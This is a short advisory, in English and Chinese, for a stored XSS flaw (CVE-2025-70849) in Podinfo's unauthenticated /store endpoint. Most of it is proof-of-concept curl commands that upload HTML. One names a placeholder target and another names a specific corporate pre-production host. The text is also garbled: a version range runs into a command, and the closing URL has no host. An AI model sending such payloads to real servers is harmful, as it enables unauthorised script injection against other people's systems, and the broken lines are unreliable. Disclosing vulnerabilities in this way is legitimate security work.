
CVE-2025-70849: Stored XSS in Podinfo
在Podinfo(一个用于演示Kubernetes微服务的Web应用程序)中发现了一个安全漏洞(CWE-79)。/store功能允许未认证用户上传任意的HTML/JS内容,导致存储型XSS。
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
访问返回的哈希值:https:///store/